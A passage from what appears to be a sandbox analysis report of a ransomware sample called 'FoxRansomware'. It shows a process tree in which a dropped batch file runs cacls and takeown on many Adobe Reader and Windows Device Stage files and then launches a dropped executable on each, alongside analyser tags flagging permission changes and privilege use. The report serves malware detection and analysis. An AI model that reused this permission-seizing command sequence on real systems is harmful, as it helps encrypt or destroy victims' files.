    3⤵
    - Loads dropped DLL
    PID:5880
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "tasks.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:4616
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  PID:5924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    - Modifies file permissions
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "RTC.der" -nobanner
    3⤵
    PID:4768
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "RTC.der" -nobanner
      4⤵
      Executes dropped EXE
      PID:4792
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  PID:4832
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    - Modifies file permissions
    PID:4876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "end_review.gif" -nobanner
    3⤵
    PID:4892
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "end_review.gif" -nobanner
      4⤵
      PID:4908
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  PID:4976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    PID:5072
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      PID:4636
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  PID:5992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    PID:6032
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      PID:6048
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  PID:6100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    - Modifies file permissions
    PID:3696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "warning.gif" -nobanner
    3⤵
    PID:3692
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "warning.gif" -nobanner
      4⤵
      PID:2736
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  PID:2492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    3⤵
    PID:4872
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      4⤵
      PID:4332
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""
  2⤵
  PID:5088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SY______.PFB" -nobanner
    3⤵
    PID:3572
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "SY______.PFB" -nobanner
      4⤵
      PID:5104
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  PID:1600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt.hyp" -nobanner
    3⤵
    PID:692
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "brt.hyp" -nobanner
      4⤵
      PID:1616
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3056
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  PID:2780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    3⤵
    PID:3396
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    3⤵
    PID:272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "eng32.clx" -nobanner
    3⤵
    PID:3452
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "eng32.clx" -nobanner
      4⤵
      PID:3456
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
  2⤵
  PID:3516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CENTEURO.TXT" -nobanner
    3⤵
    PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CENTEURO.TXT" -nobanner
      4⤵
      PID:1560
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""
  2⤵
  PID:3600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C
    3⤵
    PID:3640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
    3⤵
    PID:3664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "UKRAINE.TXT" -nobanner
    3⤵
    PID:3840
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "UKRAINE.TXT" -nobanner
      4⤵
      PID:3868
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:2548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2212
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2336
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5264
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:2560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5352
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5372
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""
  2⤵
  PID:1140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C
    3⤵
    PID:5420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"
    3⤵
    PID:5428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AUMProduct.cer" -nobanner
    3⤵
    PID:5412
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "AUMProduct.cer" -nobanner
      4⤵
      PID:5456
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:5460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:5500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:5468
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:5532
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:5944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1068
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2764
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2660
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C
    3⤵
    PID:3032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"
    3⤵
    PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "email_all.gif" -nobanner
    3⤵
    PID:5164
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "email_all.gif" -nobanner
      4⤵
      PID:5156
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""
  2⤵
  PID:5196
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C
    3⤵
    PID:5136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"
    3⤵
    - Modifies file permissions
    PID:1996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "open_original_form.gif" -nobanner
    3⤵
    PID:2628
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "open_original_form.gif" -nobanner
      4⤵
      PID:2844
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""
  2⤵
  PID:1224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"
    3⤵
    - Modifies file permissions
    PID:5220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "rss.gif" -nobanner
    3⤵
    PID:2224
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "rss.gif" -nobanner
      4⤵
      PID:2004
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""
  2⤵
  PID:2252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"
    3⤵
    - Modifies file permissions
    PID:1092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
    3⤵
    PID:1960
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
      4⤵
      PID:3064
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""
  2⤵
  PID:2836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C
    3⤵
    PID:2476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"
    3⤵
    - Modifies file permissions
    PID:1824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd-Oblique.otf" -nobanner
    3⤵
    PID:1136
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CourierStd-Oblique.otf" -nobanner
      4⤵
      PID:1316
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""
  2⤵
  PID:2428
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C
    3⤵
    PID:3112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SY______.PFM" -nobanner
    3⤵
    PID:1052
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "SY______.PFM" -nobanner
      4⤵
      PID:1760
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
  2⤵
  PID:3192
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
    3⤵
    PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
      4⤵
      PID:2440
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""
  2⤵
  PID:2056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"
    3⤵
    - Modifies file permissions
    PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can129.hsp" -nobanner
    3⤵
    PID:3988
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "can129.hsp" -nobanner
      4⤵
      PID:3288
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""
  2⤵
  PID:2916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C
    3⤵
    PID:3260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"
    3⤵
    - Modifies file permissions
    PID:3996
